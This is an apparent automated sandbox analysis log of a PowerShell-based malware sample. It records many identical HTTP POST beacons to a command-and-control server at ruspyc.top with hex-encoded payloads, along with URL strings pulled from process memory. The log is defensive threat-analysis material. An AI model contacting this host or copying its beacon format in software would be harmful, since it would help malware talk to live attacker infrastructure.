Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: FUSIONPS FUSIONPS

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: unknown

DNS traffic detected: queries for: ruspyc.top

Source: unknown

HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: powershell.exe, 00000005.00000002.2039556612.00000000071C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microKY
Source: powershell.exe, 00000004.00000002.2096258913.00000000075E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microT
Source: powershell.exe, 00000004.00000002.2080347912.00000000065F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2037759383.0000000005918000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3266003264.0000000006BC6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2179585394.0000000006006000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000E.00000002.2154577260.00000000048C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000B.00000002.3299704805.0000000007990000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3308194663.000000000877A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3222573186.0000000003347000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3299704805.0000000007900000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3299704805.0000000007958000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ruspyc.top/j4Fvskd3/index.php
Source: powershell.exe, 0000000B.00000002.3308194663.000000000877A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ruspyc.top/j4Fvskd3/index.php(
Source: powershell.exe, 0000000B.00000002.3299704805.0000000007900000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ruspyc.top/j4Fvskd3/index.php10(1).cr
Source: powershell.exe, 0000000B.00000002.3299704805.0000000007990000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ruspyc.top/j4Fvskd3/index.php7
Source: powershell.exe, 0000000B.00000002.3299704805.0000000007990000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ruspyc.top/j4Fvskd3/index.php=
Source: powershell.exe, 0000000B.00000002.3299704805.00000000079E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ruspyc.top/j4Fvskd3/index.php?
Source: powershell.exe, 0000000B.00000002.3299704805.0000000007990000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ruspyc.top/j4Fvskd3/index.phpC
Source: powershell.exe, 0000000B.00000002.3299704805.0000000007958000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ruspyc.top/j4Fvskd3/index.phpR
Source: powershell.exe, 0000000B.00000002.3299704805.0000000007988000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ruspyc.top/j4Fvskd3/index.phpRo
Source: powershell.exe, 0000000B.00000002.3299704805.0000000007958000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ruspyc.top/j4Fvskd3/index.phpTl
Source: powershell.exe, 0000000B.00000002.3222573186.000000000331B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ruspyc.top/j4Fvskd3/index.phpZ
Source: powershell.exe, 0000000B.00000002.3299704805.0000000007988000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ruspyc.top/j4Fvskd3/index.php_9y
Source: powershell.exe, 0000000B.00000002.3308194663.000000000877A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ruspyc.top/j4Fvskd3/index.phpb/
Source: powershell.exe, 0000000B.00000002.3299704805.0000000007988000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ruspyc.top/j4Fvskd3/index.phpeaL
Source: powershell.exe, 0000000B.00000002.3299704805.0000000007990000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ruspyc.top/j4Fvskd3/index.phpg
Source: powershell.exe, 0000000B.00000002.3299704805.0000000007988000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ruspyc.top/j4Fvskd3/index.phpitW
Source: powershell.exe, 0000000B.00000002.3299704805.0000000007990000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ruspyc.top/j4Fvskd3/index.phpk
Source: powershell.exe, 0000000B.00000002.3308194663.000000000877A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ruspyc.top/j4Fvskd3/index.phpm32
Source: powershell.exe, 0000000B.00000002.3308194663.000000000877A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ruspyc.top/j4Fvskd3/index.phpncalrpc:
Source: powershell.exe, 0000000B.00000002.3299704805.00000000079B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ruspyc.top/j4Fvskd3/index.phpon
Source: powershell.exe, 0000000B.00000002.3299704805.0000000007958000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ruspyc.top/j4Fvskd3/index.phpp
Source: powershell.exe, 0000000B.00000002.3222573186.0000000003347000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ruspyc.top/j4Fvskd3/index.phppv8
Source: powershell.exe, 0000000B.00000002.3299704805.0000000007990000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ruspyc.top/j4Fvskd3/index.phpq
Source: powershell.exe, 00000005.00000002.2036156838.00000000049CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000004.00000002.2069596451.0000000004D61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2036156838.00000000048B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3229826918.0000000005331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2154577260.0000000004771000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.2036156838.00000000049CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000E.00000002.2154577260.00000000048C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000005.00000002.2035279040.0000000002DA9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aka..winsvr
Source: powershell.exe, 00000004.00000002.2069596451.0000000004D61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2036156838.00000000048B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3229826918.0000000005331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2154577260.0000000004771000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lBeq
Source: powershell.exe, 00000005.00000002.2036156838.00000000049CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 0000000E.00000002.2179585394.0000000006006000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000E.00000002.2179585394.0000000006006000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000E.00000002.2179585394.0000000006006000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000E.00000002.2154577260.00000000048C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
